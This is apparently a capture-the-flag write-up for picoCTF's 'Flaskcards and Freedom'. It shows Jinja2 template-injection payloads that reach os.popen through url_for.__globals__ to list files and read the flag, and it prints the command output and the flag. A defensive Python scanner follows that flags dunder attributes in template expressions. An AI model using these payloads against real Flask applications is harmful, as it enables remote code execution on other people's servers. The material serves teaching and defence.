Tags: ssti
# ▼▼▼Flaskcards and Freedom - Points: 900▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
There seem to be a few more files stored on the flash card server but we can't login. Can you? http://2018shell2.picoctf.com:5010 (link)
Hint:
・There's more to the original vulnerability than meets the eye.
・Can you leverage the injection technique to get remote code execution?
・Sorry, but the database still reverts every 2 hours.
```
---
## 【Aim for remote code execution】
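The payload walks from the `url_for` function available in the template to its `__globals__`, reaches the `os` module there, and calls `popen` to run a command:

`{{url_for.__globals__.os.__dict__.popen('ls').read()}}`

↓

```
app flag server.py xinet_startup.sh
```

↓

The directory listing shows a `flag` file.

---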

`{{url_for.__globals__.os.__dict__.popen('cat flag').read()}}`

↓

`picoCTF{R_C_E_wont_let_me_be_76de9280}`
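
A defender-side counterpart to the payloads above, as an added example that is not part of the original writeup: it flags request fields in which a Jinja2 expression reaches a double-underscore attribute such as `__globals__`, including after repeated URL encoding. The sample requests and the field names `question` and `answer` are constructed assumptions, not taken from the challenge server.

```python
import re
from urllib.parse import unquote_plus

# Jinja2 expression {{ ... }} or statement {% ... %} delimiters
TEMPLATE_EXPR = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)
# Double-underscore attribute names such as __globals__ or __dict__
DUNDER = re.compile(r"__[A-Za-z]+__")

# Constructed sample form submissions; field names are assumptions
SAMPLE_REQUESTS = [
    {"question": "What is 2+2?", "answer": "4"},
    {"question": "Jinja syntax", "answer": "variables look like {{ name }}"},
    {"question": "{{url_for.__globals__.os.__dict__.popen('ls').read()}}",
     "answer": "x"},
    {"question": "q", "answer": "%257B%257Burl_for.__globals__%257D%257D"},
]

def decode_fully(value, max_rounds=3):
    """Undo repeated URL encoding so double-encoded input is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def ssti_findings(fields):
    """Return (field, expression, dunder names) per suspicious expression."""
    findings = []
    for name, raw in fields.items():
        text = decode_fully(raw)
        for match in TEMPLATE_EXPR.finditer(text):
            expr = (match.group(1) or match.group(2) or "").strip()
            dunders = DUNDER.findall(expr)
            if dunders:
                findings.append((name, expr, dunders))
    return findings

def scan(requests):
    """Return (request index, findings) for every request with a hit."""
    hits = []
    for index, fields in enumerate(requests):
        found = ssti_findings(fields)
        if found:
            hits.append((index, found))
    return hits

if __name__ == "__main__":
    for index, found in scan(SAMPLE_REQUESTS):
        print(index, found)
```

A pattern match like this is a triage aid for logs or a WAF rule, not a fix. The fix is to keep user input out of the template source and pass it only as a render context variable.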